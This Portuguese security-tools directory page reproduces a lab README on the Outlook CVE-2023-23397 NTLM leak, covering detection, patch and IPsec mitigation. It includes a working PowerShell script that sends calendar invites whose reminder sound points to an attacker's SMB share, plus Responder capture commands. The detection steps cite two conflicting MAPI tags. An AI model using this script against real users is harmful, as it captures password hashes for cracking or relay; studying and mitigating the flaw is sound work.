Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-23397 — Demonstração da vulnerabilidade CVE-2023-23397 de escalada de privilégios do Outlook | Kitploit
Ferramentas/GitHubGitHub/gilospy/cve-2023-23397
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubgilospy/cve-2023-23397

CVE-2023-23397

Demonstração da vulnerabilidade CVE-2023-23397 de escalada de privilégios do Outlook

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Demonstração de Exploração e Mitigação do CVE-2023-23397

📌 Visão Geral

Este projeto demonstra a detecção, exploração e mitigação do CVE-2023-23397, uma vulnerabilidade crítica de relay NTLM de zero clique no Microsoft Outlook para Windows. Explorada por meio de convites de calendário, essa vulnerabilidade permite que atacantes capturem hashes NTLMv2 sem qualquer interação do usuário.

🛡️ Pontuação CVSS: 9.8 (Crítica)
🖥️ Versões Afetadas: Outlook 2013, 2016, 2019, Microsoft 365 (antes do patch de 14 de março de 2023)


⚠️ Detalhes da Vulnerabilidade

Os lembretes de calendário do Outlook podem ser configurados para reproduzir sons personalizados por meio da propriedade MAPI PidLidReminderFileParameter. O Outlook não valida caminhos UNC, permitindo solicitações SMB remotas quando os lembretes são acionados.

root@kitploit:~
\\attacker-ip\share\sound.wav

Isso faz com que hashes NTLMv2 sejam enviados a servidores controlados pelo atacante, que podem então:

  • Ser quebrados offline (recuperação de senhas)
  • Ser usados em ataques de relay NTLM para escalonamento de privilégios

🔍 Método de Detecção

Use o MFCMAPI para inspecionar itens de calendário e verificar se há valores maliciosos em PidLidReminderFileParameter (tag MAPI 0x851F001F).

Passos:

  1. Abra o MFCMAPI → QuickStart > Open Folder > Calendar
  2. Vá para Table > Set Columns
  3. Adicione a tag de propriedade 0x808A001F para visualizar os caminhos dos arquivos de lembrete
  4. Procure por caminhos UNC como um indicador de comprometimento

🛠️ Técnicas de Mitigação

1. Aplicar o Patch da Microsoft (Recomendado)

Instale o patch de 14 de março de 2023 (por exemplo, KB5002044). O patch introduz:

  • IsFileZoneLocalIntranetOrTrusted() para validar os caminhos dos arquivos de lembrete
  • Opções de Política de Grupo para definir domínios confiáveis

Resultado do Teste:
O Outlook registrará o Event ID 1008 e bloqueará o acesso a caminhos SMB não confiáveis.


2. Mitigação em Nível de Rede via IPsec (Temporária)

a. Bloquear Todo o SMB

  • Bloqueia TCP 445 de saída (SMB)
  • Impede vazamentos de NTLM para redes não confiáveis

b. Permitir Apenas IPs Confiáveis

  • Defina IPs internos (por exemplo, 192.168.1.0/24)
  • Mantenha a continuidade dos negócios para o uso interno de SMB

📂 Política pré-criada: OutlookMitigation.ipsec


💻 Configuração do Projeto

Ambiente

SistemaNome de UsuárioSenha
Kali Linuxkalikali
Windows 10 VMCVE-2023-23397vbox@123
Conta de E-mailvictim​@exploit.comvbox@123

Atacante (Kali Linux)

root@kitploit:~
sudo apt install responder
sudo responder -I eth0 -v

Certifique-se de que o Kali e a VM vítima estejam na mesma rede.


Vítima (Windows + Outlook 2013)

  1. Instale:

    • Outlook 2013
    • .NET 2.0
    • hMailServer
    • MFCMAPI
  2. Configure:

    • Domínio do hMailServer: exploit.com
    • Usuário de e-mail: [email protected]

🚨 Exploração (Script PowerShell)

root@kitploit:~
# Initialize Outlook COM object
$Outlook = New-Object -ComObject Outlook.Application
$Namespace = $Outlook.GetNamespace("MAPI")
 
$ip = "192.168.1.7" # Attacker IP here
$emails = @("[email protected]")  # List of emails

# Create a new appointment item
$Appointment = $Outlook.CreateItem(1) # 1 corresponds to olAppointmentItem

# Set appointment properties
$Appointment.Subject = "CVE Presentation Demo Demo"
$Appointment.Body = "This is a test meeting, please ignore it."
$Appointment.Location = "Dubai"
$Appointment.Start = (Get-Date).AddSeconds(1) # Start time set to 1 second from now
$Appointment.Duration = 30 # Duration in minutes

# Configure reminder settings
$Appointment.ReminderSet = $true
$Appointment.ReminderMinutesBeforeStart = 0
$Appointment.ReminderOverrideDefault = $true
$Appointment.ReminderPlaySound = $true
$Appointment.ReminderSoundFile = "\\$ip\nonexistent\sound.wav"

foreach ($email in $emails) {
    $Appointment.Recipients.Add($email) | Out-Null
}

# Save and send the appointment
$Appointment.Save()
$Appointment.Send()

O Responder capturará o hash NTLMv2 do sistema da vítima.


✅ Verificação

Detecção

  • Use o MFCMAPI para confirmar se PidLidReminderFileParameter contém um caminho UNC.

Mitigação

  • Aplique o patch ou a política IPsec.
  • Execute o script novamente: o Outlook pode exibir um lembrete, mas nenhum hash NTLM deve ser capturado.

❗ Limitações

  • Bloquear todo o tráfego SMB pode afetar serviços legítimos (compartilhamento de arquivos, autenticação de domínio)
  • Manter IPs confiáveis pode se tornar operacionalmente complexo
Baixar ferramenta